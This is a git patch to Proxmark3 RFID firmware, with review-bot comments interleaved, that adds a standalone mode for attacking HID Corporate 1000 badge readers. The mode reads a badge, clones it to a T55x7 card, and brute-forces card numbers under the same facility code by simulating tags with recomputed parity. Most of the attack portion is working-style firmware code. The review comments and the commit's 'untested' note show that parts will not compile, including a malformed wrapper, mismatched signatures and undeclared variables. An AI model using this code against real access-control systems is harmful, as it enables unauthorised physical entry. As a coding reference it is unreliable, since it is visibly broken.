From fab1b64760180e96dc625a8a73dc552766fe4b3b Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sun, 29 Oct 2017 03:26:46 +0100 Subject: [PATCH] ADD: standalone mode : LF HID corporate 1000 bruteforce by @federicodotta et al. https://github.com/federicodotta/proxmark3 --adjusted to fit iceman fork and latest enhancements to LF (untested) FIX: some calls to deviceside demods, use 0 instead of reference. ADD: timeout after n cycles of simulating --- armsrc/Makefile | 5 +- armsrc/Standalone/lf_hidbrute.c | 328 ++++++++++++++++++++++++++++++++ armsrc/Standalone/lf_hidbrute.h | 23 +++ armsrc/appmain.c | 34 ++-- armsrc/apps.h | 12 +- armsrc/lfops.c | 75 +++++--- 6 files changed, 427 insertions(+), 50 deletions(-) create mode 100644 armsrc/Standalone/lf_hidbrute.c create mode 100644 armsrc/Standalone/lf_hidbrute.h diff --git a/armsrc/Makefile b/armsrc/Makefile index e285f4e67..50cf3bb4a 100644 --- a/armsrc/Makefile +++ b/armsrc/Makefile @@ -35,7 +35,7 @@ APP_CFLAGS = -DWITH_CRC \ # -DWITH_LF_ICERUN # -DWITH_LF_SAMYRUN # -DWITH_LF_PROXBRUTE -# -DWITH_LF_HIDCORP +# -DWITH_LF_HIDBRUTE # -DWITH_HF_YOUNG # -DWITH_HF_MATTYRUN # -DWITH_HF_COLIN @@ -44,7 +44,7 @@ APP_CFLAGS = -DWITH_CRC \ SRC_LCD = fonts.c LCD.c SRC_LF = lfops.c hitag2.c hitagS.c lfsampling.c pcf7931.c lfdemod.c SRC_ISO15693 = iso15693.c iso15693tools.c -SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c epa.c +SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c epa.c mifaresim.c SRC_ISO14443b = iso14443b.c SRC_FELICA = felica.c SRC_CRAPTO1 = crypto1.c des.c aes.c desfire_key.c desfire_crypto.c mifaredesfire.c @@ -101,6 +101,7 @@ ARMSRC = fpgaloader.c \ cmd.c \ hf_young.c # lf_samyrun.c \ + # lf_hidbrute.c \ # Do not move this inclusion before the definition of {THUMB,ASM,ARM}SRC include ../common/Makefile.common diff --git a/armsrc/Standalone/lf_hidbrute.c b/armsrc/Standalone/lf_hidbrute.c new file mode 100644 index 000000000..bd7047cac --- /dev/null 
+++ b/armsrc/Standalone/lf_hidbrute.c 
@@ -0,0 +1,328 @@ +//----------------------------------------------------------------------------- +// Samy Kamkar, 2012 +// Federico Dotta, 2015 +// Maurizio Agazzini, 2015 +// Christian Herrmann, 2017 +// +// This code is licensed to you under the terms of the GNU GPL, version 2 or, +// at your option, any later version. See the LICENSE.txt file for the text of +// the license. +// +// PROXMARK3 - HID CORPORATE 1000 BRUTEFORCER (STAND-ALONE MODE) +// +// This version of Proxmark3 firmware adds one extra stand-alone mode to proxmark3 firmware. +// The new stand-alone mode allows to execute a bruteforce on HID Corporate 1000 readers, by +// reading a specific badge and bruteforcing the Card Number (incrementing and decrementing it), +// mainteining the same Facility Code of the original badge. +// +// Based on an idea of Brad Antoniewicz of McAfee® Foundstone® Professional Services (ProxBrute), +// the stand-alone mode has been rewritten in order to overcome some limitations of ProxBrute firmware, +// that does not consider parity bits. +// +// https://github.com/federicodotta/proxmark3 +// +//----------------------------------------------------------------------------------- +// main code for LF aka HID corporate brutefore by Federico Dotta & Maurizio Agazzini +//----------------------------------------------------------------------------------- +#include "lf_hidbrute.h" + +// samy's sniff and repeat routine for LF +void RunMod() { + StandAloneMode(); + FpgaDownloadAndGo(FPGA_BITSTREAM_LF); + + uint32_t high[OPTS], low[OPTS]; + int selected = 0; + int playing = 0; + int cardRead = 0; + + // Turn on selected LED + LED(selected + 1, 0); + + for (;;) { + WDT_HIT(); + + // exit from SamyRun, send a usbcommand. + if (usb_poll_validate_length()) break; + + // Was our button held down or pressed? 
+ int button_pressed = BUTTON_HELD(1000); + //SpinDelay(300); + + // Button was held for a second, begin recording + if (button_pressed > 0 && cardRead == 0) { + LEDsoff(); + LED(selected + 1, 0); + LED(LED_RED2, 0); + + // record + DbpString("Starting recording"); + + // wait for button to be released + while(BUTTON_PRESS()) + WDT_HIT(); + + /* need this delay to prevent catching some weird data */ + SpinDelay(500); + + CmdHIDdemodFSK(1, &high[selected], &low[selected], 0); + Dbprintf("Recorded %x %x %08x", selected, high[selected], low[selected]); + + LEDsoff(); + LED(selected + 1, 0); + // Finished recording + // If we were previously playing, set playing off + // so next button push begins playing what we recorded + playing = 0; + cardRead = 1; + } + else if (button_pressed > 0 && cardRead == 1) { + LEDsoff(); + LED(selected + 1, 0); + LED(LED_ORANGE, 0); + + // record + Dbprintf("Cloning %x %x %08x", selected, high[selected], low[selected]); + + // wait for button to be released + while(BUTTON_PRESS()) + WDT_HIT(); + + /* need this delay to prevent catching some weird data */ + SpinDelay(500); + + CopyHIDtoT55x7(0, high[selected], low[selected], 0); + Dbprintf("Cloned %x %x %08x", selected, high[selected], low[selected]); + + LEDsoff(); + LED(selected + 1, 0); + // Finished recording + + // If we were previously playing, set playing off + // so next button push begins playing what we recorded + playing = 0; + cardRead = 0; + } + + // Change where to record (or begin playing) + else if (button_pressed) { + // Next option if we were previously playing + if (playing) + selected = (selected + 1) % OPTS; + playing = !playing; + + LEDsoff(); + LED(selected + 1, 0); + + // Begin transmitting + if (playing && selected != 2) { + + LED(LED_GREEN, 0); + DbpString("Playing"); + + // wait for button to be released + while (BUTTON_PRESS()) + WDT_HIT(); + + Dbprintf("%x %x %08x", selected, high[selected], low[selected]); + CmdHIDsimTAG(high[selected], low[selected], 0); + 
DbpString("Done playing"); + + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } + + /* We pressed a button so ignore it here with a delay */ + SpinDelay(300); + + // when done, we're done playing, move to next option + selected = (selected + 1) % OPTS; + playing = !playing; + LEDsoff(); + LED(selected + 1, 0); + } + else if (playing && selected == 2) + { + // Now it work only with HID Corporate 1000 (35bit), but is easily extensible to others RFID. + // It is necessary only to calculate the correct parity. + + // Brute force code + // Check if the badge is an HID Corporate 1000 + if( (high[selected] & 0xFFFFFFF8) != 0x28 ) { + DbpString("Card is not a HID Corporate 1000. Skipping bruteforce."); + continue; + } + + LED(LED_GREEN, 0); + DbpString("Entering bruteforce mode"); + // wait for button to be released + while (BUTTON_PRESS()) + WDT_HIT(); + + // Calculate Facility Code and Card Number from high and low + uint32_t cardnum = (low[selected] >> 1) & 0xFFFFF; + uint32_t fc = ((high[selected] & 1 ) << 11 ) | (low[selected] >> 21); + uint32_t original_cardnum = cardnum; + + Dbprintf("Proxbrute - starting decrementing card number"); + + while (cardnum >= 0) { + + // Needed for exiting from proxbrute when button is pressed + if (BUTTON_PRESS()) { + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } else { + while (BUTTON_PRESS()) { WDT_HIT(); } + break; + } + } + + // Decrement Card Number + cardnum--; + + // Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables + hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc); + + // Print actual code to brute + Dbprintf("TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum); + + CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000); + } + + cardnum = original_cardnum; + + Dbprintf("Proxbrute - starting incrementing 
card number"); + + while (cardnum <= 0xFFFFF) { + + // Needed for exiting from proxbrute when button is pressed + if (BUTTON_PRESS()) { + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } else { + while (BUTTON_PRESS()) { WDT_HIT(); } + break; + } + } + + // Decrement Card Number + cardnum++; + + // Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables + hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc); + + // Print actual code to brute + Dbprintf("TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum); + + CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000); + } + + DbpString("Done brute"); + if (BUTTON_HELD(1000) > 0) { + DbpString("Exiting"); + LEDsoff(); + return; + } + + /* We pressed a button so ignore it here with a delay */ + SpinDelay(300); + + // when done, we're done playing, move to next option + selected = (selected + 1) % OPTS; + playing = !playing; + LEDsoff(); + LED(selected + 1, 0); + + } else { + while(BUTTON_PRESS()) + WDT_HIT(); + } + } + } +} + +// Function that calculate next value for the brutforce of HID corporate 1000 +void hid_corporate_1000_calculate_checksum_and_set( uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) { + + uint32_t new_high = 0; + uint32_t new_low = 0; + + // Calculate new high and low base value from card number and facility code, without parity + new_low = (fc << 21) | (cardnum << 1); + new_high = 0x28 | ((fc >> 11) & 1); // 0x28 is 101000 + + int n_ones; + uint32_t i; + + // Calculating and setting parity bit 34 + // Select only bit used for parity bit 34 in low number (10110110110110110110110110110110) + uint32_t parity_bit_34_low = new_low & 0xB6DB6DB6; + n_ones = 0; + // Calculate number of ones in low number + for ( i = 1; i != 0; i <<= 1) { + if( parity_bit_34_low & i ) + n_ones++; + } + // Calculate number of ones 
in high number + if (new_high & 1) + n_ones++; + + // Set parity bit (Even parity) + if (n_ones % 2) + new_high = new_high | 0x2; + + // Calculating and setting parity bit 1 + // Select only bit used for parity bit 1 in low number (01101101101101101101101101101100) + uint32_t parity_bit_1_low = new_low & 0x6DB6DB6C; + n_ones = 0; + + // Calculate number of ones in low number + for ( i=1; i != 0; i <<= 1) { + if( parity_bit_1_low & i ) + n_ones++; + } + // Calculate number of ones in high number + if ( new_high & 0x1) + n_ones++; + + if ( new_high & 0x2) + n_ones++; + + // Set parity bit (Odd parity) + if (!(n_ones % 2)) + new_low = new_low | 0x1; + + // Calculating and setting parity bit 35 + n_ones = 0; + // Calculate number of ones in low number (all bit of low, bitmask unnecessary) + for (i = 1; i != 0; i <<= 1) { + if ( new_low & i ) + n_ones++; + } + // Calculate number of ones in high number + if ( new_high & 0x1) + n_ones++; + + if ( new_high & 0x2) + n_ones++; + + // Set parity bit (Odd parity) + if (!(n_ones % 2)) + new_high = new_high | 0x4; + + // Setting new calculated values + *low = new_low; + *high = new_high; +} + +// prepare a waveform pattern in the buffer based on the ID given then +// simulate a HID tag until the button is pressed or after #numcycles cycles +// Used to bruteforce HID in standalone mode. + diff --git a/armsrc/Standalone/lf_hidbrute.h b/armsrc/Standalone/lf_hidbrute.h new file mode 100644 index 000000000..5a7bf32dc --- /dev/null +++ b/armsrc/Standalone/lf_hidbrute.h 
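Review bot: Both card-number loops in RunMod run past the 20-bit field they are meant to cover. `cardnum` is a `uint32_t`, so `while (cardnum >= 0)` is always true and `cardnum--` at zero wraps to 0xFFFFFFFF, while `while (cardnum <= 0xFFFFF)` followed by `cardnum++` produces 0x100000; in both cases `cardnum << 1` in hid_corporate_1000_calculate_checksum_and_set then spills into the facility-code bits. Bounding them as `while (cardnum > 0)` and `while (cardnum < 0xFFFFF)` keeps the value in range and lets each loop end on its own instead of only on a button press. Separately, `high[OPTS]` and `low[OPTS]` are read by the play branch before anything has been recorded, so they should start zeroed (`uint32_t high[OPTS] = {0}, low[OPTS] = {0};`). The comment in the second loop still says "Decrement Card Number".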
@@ -0,0 +1,23 @@ +//----------------------------------------------------------------------------- +// Samy Kamkar 2012 +// Christian Herrmann, 2017 +// +// This code is licensed to you under the terms of the GNU GPL, version 2 or, +// at your option, any later version. See the LICENSE.txt file for the text of +// the license. +//----------------------------------------------------------------------------- +// StandAlone Mod +//----------------------------------------------------------------------------- + +#ifndef __LF_SAMYRUN_H +#define __LF_SAMYRUN_H + +//#include // for bool +#include "standalone.h" // standalone definitions +#include "apps.h" // debugstatements, lfops? + +#define OPTS 3 + +void hid_corporate_1000_calculate_checksum_and_set( uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc); + +#endif /* __LF_SAMYRUN_H */ \ No newline at end of file diff --git a/armsrc/appmain.c b/armsrc/appmain.c index 1656d7b23..97bbab48d 100644 --- a/armsrc/appmain.c +++ b/armsrc/appmain.c @@ -392,8 +392,8 @@ void printStandAloneModes(void) { #if defined(WITH_LF_PROXBRUTE) DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)"); #endif - #if defined(WITH_LF_HIDCORP) - DbpString(" LF HID corporate 1000 bruteforce - (Federi Codotta)"); + #if defined(WITH_LF_HIDBRUTE) + DbpString(" LF HID corporate 1000 bruteforce - (Federico dotta & Maurizio Agazzini)"); #endif #if defined(WITH_HF_MATTYRUN) DbpString(" HF Mifare sniff/clone - aka MattyRun (Matta Real)"); @@ -585,9 +585,11 @@ void UsbPacketReceived(uint8_t *packet, int len) { cmd_send(CMD_ACK, bits, 0, 0, 0, 0); break; } - case CMD_HID_DEMOD_FSK: - CmdHIDdemodFSK(c->arg[0], 0, 0, 1); + case CMD_HID_DEMOD_FSK: { + uint32_t high, low; + CmdHIDdemodFSK(c->arg[0], &high, &low, 1); break; + } case CMD_HID_SIM_TAG: CmdHIDsimTAG(c->arg[0], c->arg[1], 1); break; 
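Review bot: The include guard in lf_hidbrute.h is still `__LF_SAMYRUN_H`, apparently carried over from the SamyRun header. If both headers ever reach the same translation unit, this one is skipped silently and `OPTS` and the `hid_corporate_1000_calculate_checksum_and_set` prototype disappear with it. A guard of its own, e.g. `#ifndef LF_HIDBRUTE_H`, avoids that and also drops the double-underscore prefix, which is reserved for the implementation. A short comment on `OPTS` saying it is the number of record slots RunMod cycles through would help, since RunMod gives slot index 2 special meaning.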
@@ -603,15 +605,19 @@ void UsbPacketReceived(uint8_t *packet, int len) { case CMD_HID_CLONE_TAG: CopyHIDtoT55x7(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); break; - case CMD_IO_DEMOD_FSK: - CmdIOdemodFSK(c->arg[0], 0, 0, 1); + case CMD_IO_DEMOD_FSK: { + uint32_t high, low; + CmdIOdemodFSK(c->arg[0], &high, &low, 1); break; + } case CMD_IO_CLONE_TAG: CopyIOtoT55x7(c->arg[0], c->arg[1]); break; - case CMD_EM410X_DEMOD: - CmdEM410xdemod(c->arg[0], 0, 0, 1); + case CMD_EM410X_DEMOD: { + uint32_t high, low; + CmdEM410xdemod(c->arg[0], &high, &low, 1); break; + } case CMD_EM410X_WRITE_TAG: WriteEM410x(c->arg[0], c->arg[1], c->arg[2]); break; @@ -660,9 +666,12 @@ void UsbPacketReceived(uint8_t *packet, int len) { case CMD_EM4X_WRITE_WORD: EM4xWriteWord(c->arg[0], c->arg[1], c->arg[2]); break; - case CMD_AWID_DEMOD_FSK: // Set realtime AWID demodulation - CmdAWIDdemodFSK(c->arg[0], 0, 0, 1); + case CMD_AWID_DEMOD_FSK: { + uint32_t high, low; + // Set realtime AWID demodulation + CmdAWIDdemodFSK(c->arg[0], &high, &low, 1); break; + } case CMD_VIKING_CLONE_TAG: CopyVikingtoT55xx(c->arg[0], c->arg[1], c->arg[2]); break; @@ -1195,13 +1204,14 @@ void __attribute__((noreturn)) AppMain(void) { * All standalone mod "main loop" should be the RunMod() function. * Since the standalone is either LF or HF, the somewhat bisarr defines below exists. */ -#if defined (WITH_LF) && defined (WITH_LF_SAMYRUN) +#if defined (WITH_LF) && ( defined (WITH_LF_SAMYRUN) || defined (WITH_LF_HIDBRUTE) ) RunMod(); #endif -#if defined (WITH_ISO14443a) && defined (WITH_HF_YOUNG) +#if defined (WITH_ISO14443a) && defined (WITH_HF_YOUNG) RunMod(); #endif + // when here, we are no longer in standalone mode. // reseting the variables which keeps track of usb re-attached/configured //SetUSBreconnect(0); diff --git a/armsrc/apps.h b/armsrc/apps.h index d23efa17f..6e031f07a 100644 --- a/armsrc/apps.h +++ b/armsrc/apps.h 
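Review bot: The widened guard in AppMain, `defined (WITH_LF_SAMYRUN) || defined (WITH_LF_HIDBRUTE)`, treats the two flags as interchangeable, but each standalone source supplies its own `RunMod()`, so a build with both flags set would presumably fail with a duplicate-symbol link error rather than a clear message. A compile-time check next to this block makes the constraint explicit: `#if defined(WITH_LF_SAMYRUN) && defined(WITH_LF_HIDBRUTE)`, `#error "select only one LF standalone mode"`, `#endif`. AppMain's body continues outside the hunk, so I cannot see whether the LF and HF blocks can both fire and call `RunMod()` twice in one pass.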
@@ -79,16 +79,18 @@ void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc); void AcquireTiType(void); void AcquireRawBitsTI(void); +void SimulateTagLowFrequencyEx(int period, int gap, int ledcontrol, int numcycles); void SimulateTagLowFrequency(int period, int gap, int ledcontrol); void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen); -void CmdHIDsimTAG(int hi, int lo, int ledcontrol); +void CmdHIDsimTAGEx(uint32_t hi, uint32_t lo, int ledcontrol, int numcycles); +void CmdHIDsimTAG(uint32_t hi, uint32_t lo, int ledcontrol); void CmdFSKsimTAG(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); void CmdASKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); -void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol); -void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol); // Realtime demodulation mode for AWID26 -void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol); -void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol); +void CmdHIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol); +void CmdAWIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol); // Realtime demodulation mode for AWID26 +void CmdEM410xdemod(int findone, uint32_t *high, uint32_t *low, int ledcontrol); +void CmdIOdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol); void CopyIOtoT55x7(uint32_t hi, uint32_t lo); // Clone an ioProx card to T5557/T5567 void CopyHIDtoT55x7(uint32_t hi2, uint32_t hi, uint32_t lo, uint8_t longFMT); // Clone an HID card to T5557/T5567 void CopyVikingtoT55xx(uint32_t block1, uint32_t block2, uint8_t Q5); diff --git a/armsrc/lfops.c b/armsrc/lfops.c index 7058b282f..e88576334 100644 --- a/armsrc/lfops.c +++ b/armsrc/lfops.c 
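Review bot: The two new prototypes, `SimulateTagLowFrequencyEx` and `CmdHIDsimTAGEx`, take a `numcycles` argument whose contract is not stated anywhere in apps.h. From the lfops.c hunks, the plain wrappers pass -1 to mean no limit, and a non-negative value makes the simulation loop return after that many iterations without switching the field off. A one-line comment above each prototype would save callers from reading the loop, for example `// numcycles: -1 = run until button/USB, >= 0 = return after that many cycles (field stays on)`.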
@@ -395,8 +395,7 @@ void WriteTItag(uint32_t idhi, uint32_t idlo, uint16_t crc) StopTicks(); } -void SimulateTagLowFrequency(int period, int gap, int ledcontrol) -{ +void SimulateTagLowFrequencyEx(int period, int gap, int ledcontrol, int numcycles) { // note this may destroy the bigbuf so be sure this is called before now... //FpgaDownloadAndGo(FPGA_BITSTREAM_LF); @@ -404,7 +403,6 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol) FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_EDGE_DETECT); SpinDelay(20); - #define BREAK_OUT_LIMIT int i = 0; uint8_t *buf = BigBuf_get_addr(); @@ -424,6 +422,15 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol) for(;;) { + if ( numcycles > -1 ) { + if ( x != numcycles ) { + ++x; + } else { + // exit without turning of field + return; + } + } + if (ledcontrol) LED_D_ON(); // wait until SSC_CLK goes HIGH @@ -461,9 +468,13 @@ void SimulateTagLowFrequency(int period, int gap, int ledcontrol) OUT: FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); LED_D_OFF(); - return; } +void SimulateTagLowFrequency(int period, int gap, int ledcontrol) { + SimulateTagLowFrequencyEx(period, gap, ledcontrol, -1); +} + + #define DEBUG_FRAME_CONTENTS 1 void SimulateTagLowFrequencyBidir(int divisor, int t0) { @@ -563,7 +574,7 @@ static void fcAll(uint8_t fc, int *n, uint8_t clock, uint16_t *modCnt) // prepare a waveform pattern in the buffer based on the ID given then // simulate a HID tag until the button is pressed -void CmdHIDsimTAG(int hi, int lo, int ledcontrol) { +void CmdHIDsimTAGEx( uint32_t hi, uint32_t lo, int ledcontrol, int numcycles) { if (hi > 0xFFF) { DbpString("Tags can only have 44 bits. - USE lf simfsk for larger tags"); 
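Review bot: The `numcycles` exit added at the top of the `for(;;)` loop in SimulateTagLowFrequencyEx uses a bare `return`, so it bypasses the `OUT:` label where `FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF)` and `LED_D_OFF()` run. The comment shows this is deliberate, but nothing visible in lf_hidbrute.c switches the FPGA off once its loops finish, so the field and LED D may stay on after the standalone mode moves to the next slot. Either have the last caller do the shutdown explicitly or state the requirement in a comment on the function. The counter `x` is declared outside the hunk, so I cannot confirm it starts at zero on every call.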
@@ -618,10 +629,14 @@ void CmdHIDsimTAG(int hi, int lo, int ledcontrol) { } if (ledcontrol) LED_A_ON(); - SimulateTagLowFrequency(n, 0, ledcontrol); + SimulateTagLowFrequencyEx(n, 0, ledcontrol, numcycles); if (ledcontrol) LED_A_OFF(); } +void CmdHIDsimTAG( uint32_t hi, uint32_t lo, int ledcontrol) { + void CmdHIDsimTAG( hi, lo, ledcontrol, -1) +} + // prepare a waveform pattern in the buffer based on the ID given then // simulate a FSK tag until the button is pressed // arg1 contains fcHigh and fcLow, arg2 contains STT marker and clock @@ -800,12 +815,11 @@ void CmdPSKsimTag(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream) } // loop to get raw HID waveform then FSK demodulate the TAG ID from it -void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) -{ +void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); size_t size = 0; - uint32_t hi2=0, hi=0, lo=0; - int idx=0; + uint32_t hi2 = 0, hi = 0, lo = 0; + int idx = 0; int dummyIdx = 0; // Configure to go in 125Khz listen mode LFSetupFPGAForADC(95, true); @@ -813,7 +827,7 @@ void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) //clear read buffer BigBuf_Clear_keep_EM(); - while(!BUTTON_PRESS() && !usb_poll_validate_length()) { + while( !BUTTON_PRESS() && !usb_poll_validate_length()) { WDT_HIT(); if (ledcontrol) LED_A_ON(); @@ -899,8 +913,7 @@ void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) } // loop to get raw HID waveform then FSK demodulate the TAG ID from it -void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol) -{ +void CmdAWIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); size_t size; int idx=0, dummyIdx=0; @@ -978,6 +991,8 @@ void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol) } if (findone){ if (ledcontrol) LED_A_OFF(); + *high = hi; + *low = lo; break; } // reset 
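Review bot: The body of the new `CmdHIDsimTAG` wrapper is not a valid statement: `void CmdHIDsimTAG( hi, lo, ledcontrol, -1)` starts with a return type, has no semicolon, and names the wrapper itself rather than the `Ex` variant. It should read `CmdHIDsimTAGEx(hi, lo, ledcontrol, -1);`, matching how `SimulateTagLowFrequency` forwards to `SimulateTagLowFrequencyEx` earlier in this file. As written the file will not compile, which fits the "(untested)" remark in the commit message.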
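Review bot: The `CmdHIDdemodFSK` definition in the @@ -800 hunk still takes `int *high, int *low`, while apps.h in this same commit declares it with `uint32_t *high, uint32_t *low` and RunMod passes `&high[selected]` from a `uint32_t` array. That is a conflicting-types error once apps.h is included; the signature line should be `void CmdHIDdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol) {`, as was done for the AWID, EM410x and IO demods. The function body continues outside the hunk.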
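Review bot: The `*high = hi; *low = lo;` pair added to CmdAWIDdemodFSK (@@ -978) refers to `hi` and `lo`, which are not among the locals visible in this function's hunks (`dest`, `size`, `idx`, `dummyIdx`); unless they are declared outside the hunk this will not compile. The same pair is pasted into CmdIOdemodFSK (@@ -1124), whose visible declarations hold the decoded words in `code` and `code2`, so the removed `*high = code; *low = code2;` looks like the correct form there. It also replaces the split in CmdEM410xdemod (@@ -1037), where the removed `lo>>32` suggests `lo` is wider than 32 bits and `*low = lo` would then silently truncate it. Each function should store its own decoded variables rather than sharing one copied assignment.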
@@ -989,8 +1004,7 @@ void CmdAWIDdemodFSK(int findone, int *high, int *low, int ledcontrol) if (ledcontrol) LED_A_OFF(); } -void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol) -{ +void CmdEM410xdemod(int findone, uint32_t *high, uint32_t *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); size_t size=0, idx=0; @@ -1037,8 +1051,8 @@ void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol) if (findone){ if (ledcontrol) LED_A_OFF(); - *high=lo>>32; - *low=lo & 0xFFFFFFFF; + *high = hi; + *low = lo; break; } } @@ -1051,25 +1065,24 @@ void CmdEM410xdemod(int findone, int *high, int *low, int ledcontrol) if (ledcontrol) LED_A_OFF(); } -void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol) -{ +void CmdIOdemodFSK(int findone, uint32_t *high, uint32_t *low, int ledcontrol) { uint8_t *dest = BigBuf_get_addr(); int dummyIdx = 0; int idx = 0; - uint32_t code=0, code2=0; - uint8_t version=0; - uint8_t facilitycode=0; - uint16_t number=0; + uint32_t code = 0, code2 = 0; + uint8_t version = 0; + uint8_t facilitycode = 0; + uint16_t number = 0; uint8_t crc = 0; uint16_t calccrc = 0; size_t size = BigBuf_max_traceLen(); - //clear read buffer + BigBuf_Clear_keep_EM(); // Configure to go in 125Khz listen mode LFSetupFPGAForADC(95, true); - while(!BUTTON_PRESS() && !usb_poll_validate_length()) { + while (!BUTTON_PRESS() && !usb_poll_validate_length()) { WDT_HIT(); if (ledcontrol) LED_A_ON(); DoAcquisition_default(-1,true); @@ -1124,14 +1137,14 @@ void CmdIOdemodFSK(int findone, int *high, int *low, int ledcontrol) // if we're only looking for one tag if (findone){ if (ledcontrol) LED_A_OFF(); - *high=code; - *low=code2; + *high = hi; + *low = lo; break; } - code=code2=0; - version=facilitycode=0; - number=0; - idx=0; + code = code2 = 0; + version = facilitycode = 0; + number = 0; + idx = 0; WDT_HIT(); }